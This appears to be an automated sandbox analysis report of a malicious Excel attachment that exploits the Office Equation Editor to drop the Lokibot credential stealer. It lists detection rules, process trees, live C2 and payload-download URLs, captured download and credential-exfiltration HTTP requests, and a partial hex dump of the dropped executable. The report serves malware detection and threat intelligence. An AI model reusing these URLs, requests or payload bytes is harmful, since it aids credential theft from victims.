Play interactive tour

Edit tour

Analysis Report MV FORTUNE TRADER.xlsx

Overview

General Information

Sample Name:	MV FORTUNE TRADER.xlsx
Analysis ID:	353332
MD5:	b9d2e20a706f5dccd80cbfca09685732
SHA1:	b3d2b8eaa620398c83ff203c3c705d03dad55288
SHA256:	132f5ce3c879259992351ae90865928ed508f5a76ab3f97ce6cd624ecccb551d
Tags:	VelvetSweatshopxlsx
Most interesting Screenshot:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Lokibot

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Tries to steal Mail credentials (via file registry)

Yara detected aPLib compressed binary

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Searches the installation path of Mozilla Firefox

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 944 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2344 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 1276 cmdline: 'C:\Users\Public\vbc.exe' MD5: 2559B5B8D60DD663DF52D0570F5973A9)

cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://becharnise.ir/fa13/fre.php"]}

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13e4f:$des3: 68 03 66 00 00 0x18240:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1830c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: vbc.exe PID: 1276	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: vbc.exe PID: 1276	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: vbc.exe PID: 1276	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: vbc.exe PID: 1276	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.3.vbc.exe.240000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13278:$s1: http:// 0x16233:$s1: http:// 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13280:$s2: https:// 0x13278:$f1: http:// 0x16233:$f1: http:// 0x13280:$f2: https://
4.3.vbc.exe.240000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
4.3.vbc.exe.240000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
4.3.vbc.exe.240000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
4.2.vbc.exe.220e50.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13278:$s1: http:// 0x16233:$s1: http:// 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13280:$s2: https:// 0x13278:$f1: http:// 0x16233:$f1: http:// 0x13280:$f2: https://
4.2.vbc.exe.220e50.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
4.2.vbc.exe.220e50.0.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
4.2.vbc.exe.220e50.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
4.2.vbc.exe.220e50.0.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
4.2.vbc.exe.220e50.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.vbc.exe.220e50.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
4.3.vbc.exe.240000.0.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
4.2.vbc.exe.400000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.vbc.exe.400000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
4.2.vbc.exe.220e50.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
4.2.vbc.exe.400000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.vbc.exe.400000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
4.3.vbc.exe.240000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.3.vbc.exe.240000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
4.3.vbc.exe.240000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
4.2.vbc.exe.400000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
4.2.vbc.exe.400000.1.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
4.2.vbc.exe.220e50.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
4.2.vbc.exe.220e50.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
4.2.vbc.exe.400000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
4.2.vbc.exe.400000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
4.3.vbc.exe.240000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
4.3.vbc.exe.240000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
4.2.vbc.exe.400000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
4.2.vbc.exe.400000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Click to see the 25 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2344, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1276

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 103.141.138.123, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2344, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2344, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Sigma detected: Execution in Non-Executable Folder

Show sources

Source: Process started

Sigma detected: Suspicious Program Location Process Starts

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://stdyrusschinetwomast.dns.army/receiprt/regasm.exe

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://becharnise.ir/fa13/fre.php"]}

Multi AV Scanner detection for domain / URL

Show sources

Source: becharnise.ir	Virustotal: Detection: 16%	Perma Link
Source: http://kbfvzoboss.bid/alien/fre.php	Virustotal: Detection: 14%	Perma Link
Source: http://alphastand.win/alien/fre.php	Virustotal: Detection: 9%	Perma Link
Source: http://alphastand.trade/alien/fre.php	Virustotal: Detection: 10%	Perma Link
Source: http://stdyrusschinetwomast.dns.army/receiprt/regasm.exe	Virustotal: Detection: 9%	Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 36%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\Public\vbc.exe

Unpacked PE file: 4.2.vbc.exe.400000.1.unpack

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown

HTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49165 version: TLS 1.2

Spreading:

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00403D74 FindFirstFileW,

4_2_00403D74

Software Vulnerabilities:

Source: global traffic

DNS query: name: cutt.ly

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 172.67.8.238:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 172.67.8.238:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49168 -> 185.208.180.121:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 185.208.180.121:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 185.208.180.121:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49168 -> 185.208.180.121:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: http://becharnise.ir/fa13/fre.php

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 16 Feb 2021 06:02:42 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Tue, 16 Feb 2021 01:44:33 GMTETag: "41c00-5bb6a3e863566"Accept-Ranges: bytesContent-Length: 269312Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e0 7b ab 66 a4 1a c5 35 a4 1a c5 35 a4 1a c5 35 ba 48 50 35 b6 1a c5 35 ba 48 41 35 99 1a c5 35 ba 48 46 35 d7 1a c5 35 83 dc be 35 a1 1a c5 35 a4 1a c4 35 d4 1a c5 35 ba 48 4f 35 a5 1a c5 35 ba 48 57 35 a5 1a c5 35 ba 48 51 35 a5 1a c5 35 ba 48 54 35 a5 1a c5 35 52 69 63 68 a4 1a c5 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e4 41 b2 5d 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f0 02 00 00 b2 c6 04 00 00 00 00 40 30 00 00 00 10 00 00 00 00 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 c8 04 00 04 00 00 6d 30 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 86 03 00 62 00 00 00 60 7d 03 00 3c 00 00 00 00 10 c8 04 18 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 71 ee 02 00 00 10 00 00 00 f0 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 86 00 00 00 00 03 00 00 88 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a8 74 c4 04 00 90 03 00 00 28 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 18 76 00 00 00 10 c8 04 00 78 00 00 00 a4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: Joe Sandbox View	IP Address: 172.67.8.238 172.67.8.238
Source: Joe Sandbox View	IP Address: 103.141.138.123 103.141.138.123
Source: Joe Sandbox View	IP Address: 185.208.180.121 185.208.180.121

Source: Joe Sandbox View	ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: Joe Sandbox View	ASN Name: AMINIDCIR AMINIDCIR

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic	HTTP traffic detected: GET /receiprt/regasm.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: stdyrusschinetwomast.dns.army
Source: global traffic	HTTP traffic detected: POST /fa13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: becharnise.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4081BD40Content-Length: 176Connection: close

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00404ED4 recv,

4_2_00404ED4

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83553F27.emf

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /receiprt/regasm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: stdyrusschinetwomast.dns.army

Source: unknown

DNS traffic detected: queries for: cutt.ly

Source: unknown

HTTP traffic detected: POST /fa13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: becharnise.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4081BD40Content-Length: 176Connection: close

Source: vbc.exe	String found in binary or memory: http://becharnise.ir/fa13/fre.php
Source: 77EC63BDA74BD0D0E0426DC8F8008506.2.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: vbc.exe, 00000004.00000002.2375614676.0000000007200000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2375614676.0000000007200000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: 83553F27.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, vbc.exe, 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165

Source: unknown

HTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49165 version: TLS 1.2

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing from the , , yellow bar above 21 This document is 22 ? protected 3 Once you have e
Source: Screenshot number: 4	Screenshot OCR: Enable Content from the yellow bar above 24 25 26 27 28 29 lh\ Auv i r g prL?'tya vu a og u43

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
